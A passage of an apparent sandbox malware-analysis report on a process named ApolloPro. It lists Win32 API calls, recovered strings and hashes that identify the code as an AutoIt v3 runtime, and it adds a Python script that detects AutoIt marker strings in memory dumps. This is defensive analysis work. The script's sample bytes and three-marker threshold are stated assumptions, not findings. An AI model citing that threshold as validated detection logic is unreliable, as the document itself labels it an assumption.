                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81CD
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006A81D8
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A81EA
                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006C3C7C,00000000), ref: 006A8200
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006A8210
                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006A8236
                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006A8255
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8277
                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006A8464
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: dcf3fc34645425c1aa03352cbbf1293f46a0ea69cc464cc280442578a7155e1b
                                                                                              • Instruction ID: 3345b2db3f62d6260a5492d6b45e64bdfea7ea549ad2429e802ee11152bbae99
                                                                                              • Opcode Fuzzy Hash: dcf3fc34645425c1aa03352cbbf1293f46a0ea69cc464cc280442578a7155e1b
                                                                                              • Instruction Fuzzy Hash: 61023F71900115EFDB14EFA4CC89EAEBBBAEF49310F148159F915AB2A1CB359D41CF60
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,006C0980), ref: 006B3C65
                                                                                              • IsWindowVisible.USER32(?), ref: 006B3C89
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                              • API String ID: 4105515805-45149045
                                                                                              • Opcode ID: 7d2a186f14905a1eab475684f9106558498cd16cda3f9005724ef413172ca1b1
                                                                                              • Instruction ID: fb6b6de1a0d508a6f7aa284c5d4671cee29a3028dac07fdbfd99c511405d3548
                                                                                              • Opcode Fuzzy Hash: 7d2a186f14905a1eab475684f9106558498cd16cda3f9005724ef413172ca1b1
                                                                                              • Instruction Fuzzy Hash: 72D1AF70204311CBCB44EF50C951AAABBB7AF94354F14495CF9965B3A2CF31EE8ACB85
                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 006BAC55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006BAC86
                                                                                              • GetSysColor.USER32(0000000F), ref: 006BAC92
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 006BACAC
                                                                                              • SelectObject.GDI32(?,?), ref: 006BACBB
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 006BACE6
                                                                                              • GetSysColor.USER32(00000010), ref: 006BACEE
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 006BACF5
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 006BAD04
                                                                                              • DeleteObject.GDI32(00000000), ref: 006BAD0B
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 006BAD56
                                                                                              • FillRect.USER32(?,?,?), ref: 006BAD88
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BADB3
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(00000012), ref: 006BAF51
                                                                                                • Part of subcall function 006BAF18: SetTextColor.GDI32(?,?), ref: 006BAF55
                                                                                                • Part of subcall function 006BAF18: GetSysColorBrush.USER32(0000000F), ref: 006BAF6B
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(0000000F), ref: 006BAF76
                                                                                                • Part of subcall function 006BAF18: GetSysColor.USER32(00000011), ref: 006BAF93
                                                                                                • Part of subcall function 006BAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006BAFA1
                                                                                                • Part of subcall function 006BAF18: SelectObject.GDI32(?,00000000), ref: 006BAFB2
                                                                                                • Part of subcall function 006BAF18: SetBkColor.GDI32(?,00000000), ref: 006BAFBB
                                                                                                • Part of subcall function 006BAF18: SelectObject.GDI32(?,?), ref: 006BAFC8
                                                                                                • Part of subcall function 006BAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 006BAFE7
                                                                                                • Part of subcall function 006BAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006BAFFE
                                                                                                • Part of subcall function 006BAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 006BB013
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                              • String ID:
                                                                                              • API String ID: 4124339563-0
                                                                                              • Opcode ID: 327e4edcf06c300bf2dedd923b73dffce0366f717d0d860045755419332e54e4
                                                                                              • Instruction ID: 75a39fbdc314d42603e80dd1610b63e3aaac5dc94280bd2c8a12fc50359c7648
                                                                                              • Opcode Fuzzy Hash: 327e4edcf06c300bf2dedd923b73dffce0366f717d0d860045755419332e54e4
                                                                                              • Instruction Fuzzy Hash: A7A180B1008301FFE7519FA4DD08EABBBAAFF88321F141A19F566961A0D731D944CF52
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00633072
                                                                                              • DeleteObject.GDI32(00000000), ref: 006330B8
                                                                                              • DeleteObject.GDI32(00000000), ref: 006330C3
                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 006330CE
                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 006330D9
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0066C77C
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0066C7B5
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0066CBDE
                                                                                                • Part of subcall function 00631F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00632412,?,00000000,?,?,?,?,00631AA7,00000000,?), ref: 00631F76
                                                                                              • SendMessageW.USER32(?,00001053), ref: 0066CC1B
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0066CC32
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0066CC48
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0066CC53
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 464785882-4108050209
                                                                                              • Opcode ID: f66cf5bd4296f7f470df5d7e783f6320143e107ade60bda13da44549d00f7e5f
                                                                                              • Instruction ID: de9373f2e822b662f337927f3214e2e4319393cf58e57a8b3925bd3f0defd87d
                                                                                              • Opcode Fuzzy Hash: f66cf5bd4296f7f470df5d7e783f6320143e107ade60bda13da44549d00f7e5f
                                                                                              • Instruction Fuzzy Hash: DA128C30604A11EFDB25DF24C985BB9BBA6BF08320F14466DE995CB362C731ED42CB91
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 2660009612-1645009161
                                                                                              • Opcode ID: 314671920d4ab0dcb1d69e655c48ac95906f04659bb07123158b717d77b37317
                                                                                              • Instruction ID: 76d970d5a809b97f5d5a14c69c26790193b70be99df1d8a85ad90d4cfb3fb0a4
                                                                                              • Opcode Fuzzy Hash: 314671920d4ab0dcb1d69e655c48ac95906f04659bb07123158b717d77b37317
                                                                                              • Instruction Fuzzy Hash: 71A1AF70A0020AABCB51AF21DC62EBE776BBF45B40F64402CFC05AB292EB719A55D754
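                                                                                              The string set carried by this function ("#OnAutoItStartRegister", "#requireadmin", "#notrayicon", "#pragma compile" and the directive-parser error messages), together with the "AutoIt v3" window class created at 006A811F and 006A7D1D, identifies the code at image base 00630000 in process 18 (ApolloPro) as the AutoIt v3 interpreter that compiled AutoIt scripts carry with them. The following is an added example, not part of the Joe Sandbox report, showing how an analyst can check a memory dump or a dropped file for that runtime using only the strings recovered above; the sample dump bytes and the three-marker threshold are constructed assumptions, not data from this analysis.

```python
"""Triage check for AutoIt v3 runtime markers in a memory dump or dropped PE.

Added example for this report, not Joe Sandbox code. The marker list is the
set of strings the IDA plugin recovered from process 18 (ApolloPro, image
base 0x630000). The sample dump and the detection threshold are assumptions.
"""
import re

# Strings present in the function listing above (window class, script
# directives and directive-parser error messages).
MARKERS = (
    "AutoIt v3",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "#include-once",
    "Bad directive syntax error",
    "Unterminated group of comments",
)


def find_markers(blob: bytes) -> dict:
    """Return {marker: [offsets]} for every marker found as ASCII or UTF-16LE.

    The interpreter calls the wide API family (CreateWindowExW with
    "AutoIt v3"), so that class name lives in memory as UTF-16LE; directive
    strings may survive in either encoding, so both are searched,
    case-insensitively (AutoIt directives are case-insensitive).
    """
    hits = {}
    for marker in MARKERS:
        patterns = (marker.encode("ascii"), marker.encode("utf-16-le"))
        offsets = sorted(
            match.start()
            for pattern in patterns
            for match in re.finditer(re.escape(pattern), blob, flags=re.IGNORECASE)
        )
        if offsets:
            hits[marker] = offsets
    return hits


def is_autoit_runtime(blob: bytes, min_markers: int = 3) -> bool:
    """Assumed threshold: three distinct markers is treated as a positive.

    A single hit ("static", "DISPLAY" or even "#include") is too generic;
    requiring several distinct AutoIt-specific strings keeps the check from
    firing on ordinary Win32 GUI binaries.
    """
    return len(find_markers(blob)) >= min_markers


def build_sample_dump() -> bytes:
    """Constructed stand-in for a slice of the 0x630000 image (not real dump data)."""
    return (
        b"\x00" * 16
        + "AutoIt v3".encode("utf-16-le")              # window class, as at 006A811F
        + b"\x00" * 8
        + b"static\x00"                                 # generic control class
        + b"#requireadmin\x00#NoTrayIcon\x00"           # directive tokens, ASCII
        + b"Bad directive syntax error\x00"             # parser error message
        + b"DISPLAY\x00"                                # CreateDCW argument, generic
    )


def build_benign_sample() -> bytes:
    """Constructed bytes from an unrelated GUI binary: shares only generic strings."""
    return b"MZ\x90\x00" + b"static\x00" + b"DISPLAY\x00" + b"kernel32.dll\x00"


if __name__ == "__main__":
    for name, blob in (("sample", build_sample_dump()), ("benign", build_benign_sample())):
        hits = find_markers(blob)
        print(name, "->", "AutoIt runtime" if is_autoit_runtime(blob) else "no match", hits)
```

                                                                                              Run against a real `.sdmp` download or a dropped executable, read the file as bytes and pass it to `is_autoit_runtime`; the offsets returned by `find_markers` give the analyst starting points for locating the embedded script resource that the interpreter will parse.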
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 006A7BC8
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006A7C87
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006A7CC5
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006A7CD7
                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006A7D1D
                                                                                              • GetClientRect.USER32(00000000,?), ref: 006A7D29
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006A7D6D
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006A7D7C
                                                                                              • GetStockObject.GDI32(00000011), ref: 006A7D8C
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006A7D90
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006A7DA0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006A7DA9
                                                                                              • DeleteDC.GDI32(00000000), ref: 006A7DB2
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006A7DDE
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 006A7DF5
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006A7E30
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006A7E44
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 006A7E55
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006A7E85
                                                                                              • GetStockObject.GDI32(00000011), ref: 006A7E90
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006A7E9B
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006A7EA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: ebd2c3804bc4bbebf493873bbd04b335fc37f893190c860223b7c93754d18caf
                                                                                              • Instruction ID: 11a8b3e90503873540a112803ed8f6edcbde1d3dbff089c647f9eb3fafea873f
                                                                                              • Opcode Fuzzy Hash: ebd2c3804bc4bbebf493873bbd04b335fc37f893190c860223b7c93754d18caf
                                                                                              • Instruction Fuzzy Hash: E9A12EB1A40615BFEB14DBA4DC4AFBABBBAEB45710F044154FA15A72E0D770AD00CFA4
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0069B361
                                                                                              • GetDriveTypeW.KERNEL32(?,006C2C4C,?,\\.\,006C0980), ref: 0069B43E
                                                                                              • SetErrorMode.KERNEL32(00000000,006C2C4C,?,\\.\,006C0980), ref: 0069B59C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
                                                                                              • Instruction ID: 3275164797a3af913ccc058af86febee90fd3bbd658e04c6294234fc2030bb64
                                                                                              • Opcode Fuzzy Hash: 1507b621099f62de135c37858735a16af5049f015d463fc95c57c715ce61e14b
                                                                                              • Instruction Fuzzy Hash: 8C51BC30B41309DBCF00DF21DBC19BD77EBAB44B40B26A019E406A7A91D775AE82DB55
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 006BA0F7
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006BA1B0
                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 006BA1CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: 0
                                                                                              • API String ID: 2326795674-4108050209
                                                                                              • Opcode ID: 623a5968eb4c442e619635c106d6c0b77774254f203cc29f3ff3ffbc4c45b87e
                                                                                              • Instruction ID: bcc9b5d27db737063fce9e619b1e0f4922441ea19951cbebbdc0380e594d831e
                                                                                              • Opcode Fuzzy Hash: 623a5968eb4c442e619635c106d6c0b77774254f203cc29f3ff3ffbc4c45b87e
                                                                                              • Instruction Fuzzy Hash: 5602DCB1108301AFE7258F58C848BEABBE6FF85304F04851DF995963A1C775D985CB92
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 006BAF51
                                                                                              • SetTextColor.GDI32(?,?), ref: 006BAF55
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006BAF6B
                                                                                              • GetSysColor.USER32(0000000F), ref: 006BAF76
                                                                                              • CreateSolidBrush.GDI32(?), ref: 006BAF7B
                                                                                              • GetSysColor.USER32(00000011), ref: 006BAF93
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006BAFA1
                                                                                              • SelectObject.GDI32(?,00000000), ref: 006BAFB2
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 006BAFBB
                                                                                              • SelectObject.GDI32(?,?), ref: 006BAFC8
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 006BAFE7
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006BAFFE
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 006BB013
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006BB05F
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006BB086
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 006BB0A4
                                                                                              • DrawFocusRect.USER32(?,?), ref: 006BB0AF
                                                                                              • GetSysColor.USER32(00000011), ref: 006BB0BD
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 006BB0C5
                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006BB0D9
                                                                                              • SelectObject.GDI32(?,006BAC1F), ref: 006BB0F0
                                                                                              • DeleteObject.GDI32(?), ref: 006BB0FB
                                                                                              • SelectObject.GDI32(?,?), ref: 006BB101
                                                                                              • DeleteObject.GDI32(?), ref: 006BB106
                                                                                              • SetTextColor.GDI32(?,?), ref: 006BB10C
                                                                                              • SetBkColor.GDI32(?,?), ref: 006BB116
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: 60ad0bc78c74589e8e8e14ef67c509d3ea3fa29f29894abfcb91e81be18f78e8
                                                                                              • Instruction ID: 57c66d64feb24e395c8327546161b858c30085556cfa0d747da63af20fee2905
                                                                                              • Opcode Fuzzy Hash: 60ad0bc78c74589e8e8e14ef67c509d3ea3fa29f29894abfcb91e81be18f78e8
                                                                                              • Instruction Fuzzy Hash: 3D614BB1900218EFEB119FA4DD48EFEBB7AEF08320F155115F915AB2A1D7759940CF90
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006B90EA
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006B90FB
                                                                                              • CharNextW.USER32(0000014E), ref: 006B912A
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006B916B
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006B9181
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006B9192
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006B91AF
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 006B91FB
                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006B9211
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B9242
                                                                                              • _memset.LIBCMT ref: 006B9267
                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006B92B0
                                                                                              • _memset.LIBCMT ref: 006B930F
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006B9339
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 006B9391
                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 006B943E
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 006B9460
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B94AA
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006B94D7
                                                                                              • DrawMenuBar.USER32(?), ref: 006B94E6
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 006B950E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                              • String ID: 0
                                                                                              • API String ID: 1073566785-4108050209
                                                                                              • Opcode ID: f66d938d6cf3b4c45bebdb2675d83750b8d2a17814c33ddcdbdb2771da02b175
                                                                                              • Instruction ID: 66985895a2c823d4a608108bb0515d34ebc5e853f31101ab0d9aa0ed1c3eb9d8
                                                                                              • Opcode Fuzzy Hash: f66d938d6cf3b4c45bebdb2675d83750b8d2a17814c33ddcdbdb2771da02b175
